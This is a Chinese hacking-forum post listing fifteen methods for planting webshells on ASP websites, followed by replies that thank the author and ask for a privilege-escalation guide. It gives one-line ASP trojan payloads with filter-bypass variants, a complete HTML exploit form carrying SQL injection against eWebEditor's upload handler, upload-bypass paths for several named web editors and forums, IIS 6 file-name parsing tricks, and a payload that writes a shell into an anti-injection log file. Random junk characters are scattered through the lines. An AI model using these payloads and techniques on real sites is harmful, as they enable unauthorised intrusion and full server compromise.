返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
3 ^9 _6 f: u+ F* c8 D0 |$ A0 `/ `8 I3 i
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
; H, e) W# ~# ^
* ?6 p, T: y+ c! k: |: P3.上传漏洞:
& A1 V3 c6 g7 k: e4 w" [$ Z7 {+ U( [4 _( R/ m/ P) p2 q* ?
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00% ~' y, t0 `) C# k! n
, c; _4 {; _. |- N& O% {
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件4 ?& n8 \2 h6 J# o  H5 M
9 o0 @5 N1 E4 A- W8 w
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
5 I( }" e1 @" n7 t然后在上传文件里面填要传的图片格式的ASP木马4 B, X0 o5 `& ^! ]
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp' ~5 ]/ E  ?/ O" v. o5 n  M
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
! P9 ~3 A# Z1 C  N
; P$ z* a* ^# S9 j. N8 Q<html>
+ r+ k' }0 ]$ D: d<head>* I8 d$ ]  L4 `, g1 m
<title>ewebeditor upload.asp上传利用</title>2 F- J) B) l! _! ]3 n' T' p* i6 }4 E
</head># G, R  O) W; N6 y0 G  Y: y
<body>) i- H6 |4 V6 d" C$ P7 y5 v
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">1 }) x. f, |' \) A) q# O! M' x- }
<input type=file name=uploadfile size=100><br><br>
* O& {0 j# G$ K& x! R0 o3 Z<input type=submit value=Fuck>
3 [  ~2 m- e  y4 p</form>- C/ i  e9 w8 j7 x% h- h
</body>
/ t$ b, D3 Z" D) F: ]$ E7 p</form>
8 x) r3 h. J& t; V! V2 M! I3 D0 m</html>* y$ E. C1 U! M7 C% S' h
+ r+ b+ ~! D- N- C- |
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问5 e2 b" e  G# _: g, _
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
, X& w4 T2 X- S5 }6 a$ l# s& S) F3 Y2 _! F
利用windows2003解析。建立zjq.asp的文件夹
2 O9 A1 }1 B0 p1 ~! C) e) A
5 T# ~/ z/ a/ ]1 V' I: W6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型3 V5 c& D( y2 q; F# A8 B
0 s( m5 t1 g' B
7.cuteeditor:类似ewebeditor
  j: T2 p; p3 L/ I8 }3 l
- q: \# X) R: p8 B0 e7 P1 W8.htmleditor:同上
1 `5 P8 z4 r0 F$ [  ~# }+ H1 U4 g8 j9 l3 {: m
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破9 r0 h0 L7 G6 O; T
) \  g" y# w. n# R/ W. m
<%execute request("value")%><%'<% loop <%:%>
, a, R: M7 ]/ ?. S/ f3 U8 Q% z% R' a5 W7 Q
<%'<% loop <%:%><%execute request("value")%>
( W' Y# }9 q( N# }' ~
# F5 a: ^) o1 B/ E<%execute request("value")'<% loop <%:%>  a7 b* a2 A0 g3 h% v
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞$ Q4 b4 p' \, W' w* ~3 j

  r4 T7 O7 a. d4 M: E6 M: Y10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
; \7 t: {) I& A
- \, v3 k( v7 _+ @+ s11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3. D! ^/ M% H- F

$ k$ U- {4 o: R. k/ ~# N解析漏洞得到webshell! x; V4 k# O9 [! s) N

' L, d; ]; e6 f; ^12.mssql差异备份,日志备份,前提需知道web路径
, ~& @# f% C' ~& J, r+ b- K- _+ P: x; O# [$ }
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell  X% h% U2 m* l) Y
0 W# S/ J: ?7 j5 T3 D/ K2 ^( t8 |& a
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell5 }6 S; W% F% g$ E- {, J/ P
; U9 b3 u5 [2 @, \2 O! c7 R
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
$ T7 c9 m( D1 C; n; K
2 `2 g5 J; P9 k! \4 C以上只是本人的一些拙见,并不完善,以后想到了再继续添加
8 s7 g+ z% y3 _& h不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
; i0 r' k# s0 i
- p( ]; E, j/ g: @& |# i# B  c" c; o) l
很好啊、基本的入侵方法都包含了1 w+ }# a$ v' Z' C* j8 K
5 w1 s* ~. l1 J0 R5 V0 ?# A
最好来个提权的帖子再。. ?7 L8 ~) H  O+ y) M- Z- R& z
6 T( h# Y- G; d6 Y
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表